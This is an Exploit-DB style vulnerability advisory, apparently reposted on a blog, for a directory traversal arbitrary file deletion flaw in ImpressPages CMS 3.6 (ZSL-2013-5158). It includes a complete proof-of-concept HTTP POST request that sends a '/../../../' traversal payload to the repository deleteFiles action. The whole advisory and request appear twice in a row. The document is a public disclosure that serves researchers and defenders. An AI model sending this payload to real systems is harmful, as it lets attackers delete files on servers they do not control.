EDB-ID: 29328 CVE: N/A OSVDB-ID: N/A
Author: LiquidWorm Published: 2013-11-01 Verified: Not Verified
Exploit Code: Download Vulnerable App: N/A
Vendor: ImpressPages UAB
Product web page: http://www.impresspages.org
Affected version: 3.6
Summary: ImpressPages CMS is an open source web content
management system with revolutionary drag & drop interface.
Desc: Input passed to the 'files[0][file]' parameter in
'/ip_cms/modules/administrator/repository/controller.php'
is not properly sanitised before being used to delete files.
This can be exploited to delete files with the permissions
of the web server via directory traversal sequences passed
within the affected POST parameter.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2
PHP 5.4.7
MySQL 5.5.25a
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5158
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5158.php
Vendor: http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/
12.10.2013
--
POST /impresspages/ HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 387
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/impresspages/?cms_action=manage
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1
g=administrator&m=repository&a=deleteFiles&files%5B0%5D%5BfileName%5D=readme.txt&files%5B0%5D%5Bdir%5D=file%2Frepository%2F&files%5B0%5D%5Bfile%5D=/../../../joxy.txt&files%5B0%5D%5Bext%5D=txt&files%5B0%5D%5Bpreview%5D=ip_cms%2Fmodules%2Fadministrator%2Frepository%2Fpublic%2Fadmin%2Ficons%2Fgeneral.png&files%5B0%5D%5Bmodified%5D=1381393098&securityToken=c029f7293955df089676b78af8222d2a
Author: LiquidWorm Published: 2013-11-01 Verified: Not Verified
Exploit Code: Download Vulnerable App: N/A
Vendor: ImpressPages UAB
Product web page: http://www.impresspages.org
Affected version: 3.6
Summary: ImpressPages CMS is an open source web content
management system with revolutionary drag & drop interface.
Desc: Input passed to the 'files[0][file]' parameter in
'/ip_cms/modules/administrator/repository/controller.php'
is not properly sanitised before being used to delete files.
This can be exploited to delete files with the permissions
of the web server via directory traversal sequences passed
within the affected POST parameter.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2
PHP 5.4.7
MySQL 5.5.25a
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5158
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5158.php
Vendor: http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/
12.10.2013
--
POST /impresspages/ HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 387
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/impresspages/?cms_action=manage
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1
g=administrator&m=repository&a=deleteFiles&files%5B0%5D%5BfileName%5D=readme.txt&files%5B0%5D%5Bdir%5D=file%2Frepository%2F&files%5B0%5D%5Bfile%5D=/../../../joxy.txt&files%5B0%5D%5Bext%5D=txt&files%5B0%5D%5Bpreview%5D=ip_cms%2Fmodules%2Fadministrator%2Frepository%2Fpublic%2Fadmin%2Ficons%2Fgeneral.png&files%5B0%5D%5Bmodified%5D=1381393098&securityToken=c029f7293955df089676b78af8222d2a
0 comments:
Post a Comment